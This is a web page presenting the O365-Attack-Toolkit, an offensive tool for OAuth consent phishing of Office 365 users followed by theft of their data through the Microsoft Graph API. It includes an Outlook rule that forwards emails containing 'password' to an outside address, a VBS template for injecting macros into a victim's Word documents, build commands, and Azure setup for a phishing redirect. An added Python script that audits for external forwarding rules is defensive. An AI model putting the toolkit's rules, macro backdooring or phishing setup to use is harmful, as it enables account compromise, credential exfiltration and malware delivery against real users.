O365-Attack-Toolkit – A Toolkit To Attack Office365

o365-attack-toolkit allows operators to perform an OAuth phishing attack and afterwards use the Microsoft Graph API to extract interesting information.
Some of the implemented features are:

  • Extraction of keyworded e-mails from Outlook.
  • Creation of Outlook Rules.
  • Extraction of files from OneDrive/SharePoint.
  • Injection of macros into Word documents.

The management interface can be used to inspect the data extracted from the Microsoft Graph API.

Features

Outlook Keyworded Extraction
User emails can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the emails that match it will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.

Onedrive/Sharepoint Keyworded Extraction
The Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every keyword defined in the configuration file, all the documents that match it will be downloaded and saved locally. The operator can examine the documents using the management interface.

Outlook Rules Creation
The Microsoft Graph API supports the creation of Outlook rules. You can define different rules by placing the rule JSON files in the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs
Below is an example rule that, when loaded, will forward every email that contains password in the body to [email protected].

{
    "displayName": "Example Rule",
    "sequence": 2,
    "isEnabled": true,
    "conditions": {
        "bodyContains": [
            "password"
        ]
    },
    "actions": {
        "forwardTo": [
            {
                "emailAddress": {
                    "address": "[email protected]"
                }
            }
        ],
        "stopProcessingRules": false
    }
}
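From the defender's side, rules like the one above can be found by reviewing each mailbox's inbox rules for forwarding actions that leave the tenant. The following is an added example, not part of the toolkit or the original page: it assumes the rules have already been retrieved as Microsoft Graph messageRule JSON objects, and the tenant domain, addresses and the benign sample rule are constructed for illustration.

```python
# Added defensive example: audit Outlook inbox rules (Graph messageRule JSON)
# for forwarding to addresses outside the tenant's own domains.

FORWARD_ACTIONS = ("forwardTo", "redirectTo", "forwardAsAttachmentTo")
KEYWORD_CONDITIONS = ("bodyContains", "subjectContains", "bodyOrSubjectContains")


def external_recipients(rule, tenant_domains):
    """Return (action, address) pairs that send mail outside tenant_domains."""
    allowed = {d.lower() for d in tenant_domains}
    hits = []
    actions = rule.get("actions") or {}
    for action in FORWARD_ACTIONS:
        for recipient in actions.get(action) or []:
            address = ((recipient.get("emailAddress") or {}).get("address") or "").lower()
            domain = address.rpartition("@")[2]
            if domain not in allowed:  # empty or malformed addresses are flagged too
                hits.append((action, address))
    return hits


def audit_rules(rules, tenant_domains):
    """Return one finding per rule that forwards or redirects mail externally."""
    findings = []
    for rule in rules:
        hits = external_recipients(rule, tenant_domains)
        if not hits:
            continue
        conditions = rule.get("conditions") or {}
        keywords = sorted({k for c in KEYWORD_CONDITIONS for k in conditions.get(c) or []})
        findings.append({"rule": rule.get("displayName"),
                         "enabled": bool(rule.get("isEnabled")),
                         "recipients": hits,
                         "keywords": keywords})
    return findings


# Constructed sample data: one rule shaped like the page's example, one benign rule.
SAMPLE_RULES = [
    {"displayName": "Example Rule", "sequence": 2, "isEnabled": True,
     "conditions": {"bodyContains": ["password"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "collector@external.example"}}],
                 "stopProcessingRules": False}},
    {"displayName": "Team digest", "sequence": 1, "isEnabled": True,
     "conditions": {"subjectContains": ["digest"]},
     "actions": {"forwardTo": [{"emailAddress": {"address": "team@contoso.example"}}]}},
]

if __name__ == "__main__":
    for finding in audit_rules(SAMPLE_RULES, ["contoso.example"]):
        print(finding)
```
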

Word Document Macro Backdooring
User documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported on Word. It should be noted that after backdooring the documents, they can no longer be edited online, which increases the chances of our payload execution.
This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built from the template below and executed, so don't panic if you see wscript.exe running.

Dim wdApp
Set wdApp = CreateObject("Word.Application")
wdApp.Documents.Open("")
wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "MACRO"
wdApp.Documents(1).SaveAs2 "OUTPUT", 0
wdApp.Quit

How to set up

Compile

cd %GOPATH%
git clone https://github.com/0x09AL/o365-attack-toolkit
cd o365-attack-toolkit
dep ensure
go build

Configuration
An example configuration is shown below:

Deployment
Before you start using this toolkit you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.

After creating the application, copy the Application ID and change it in static/index.html.
The URL (external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.

The Redirect URL should be the URL that will be used to host the phishing endpoint, in this case https://myphishingurl.com/

Make sure to check both the boxes as shown below:

It should be noted that you can run this tool on any operating system that Go supports, but the Macro Backdooring functionality will only work on Windows.
The look of the phishing page can be changed in static/index.html.

Security Considerations
Apart from all the features this tool has, it also opens some attack surface on the host running the tool. Firstly, the Macro Backdooring functionality will open the Word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files, which will be saved on your computer.
The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and the Microsoft Graph API.

Management Interface
The management interface allows the operator to browse the data that has been extracted.

Users view

View User Emails

View Email


Published by Marshmallow
